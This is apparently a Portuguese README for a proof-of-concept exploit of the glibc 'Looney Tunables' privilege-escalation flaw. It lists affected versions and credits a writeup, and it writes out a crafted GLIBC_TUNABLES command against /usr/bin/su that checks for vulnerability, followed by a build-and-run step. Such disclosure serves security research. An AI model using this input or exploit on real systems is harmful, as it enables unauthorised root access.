
Isto é um PoC (Prova de Conceito) para a vulnerabilidade de escalonamento de privilégios no Linux "Looney Tunables". Isto é baseado em este PoC. Muito obrigado a leesh3288. Aqui você pode encontrar um writeup muito detalhado, e aqui você pode ver um vídeo muito legal do IppSec.
Verifique se é vulnerável
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Vale ressaltar que as versões vulneráveis do glibc, incluindo esta, são da 2.35-0ubuntu3.3 e anteriores.
Execute o exploit
$ make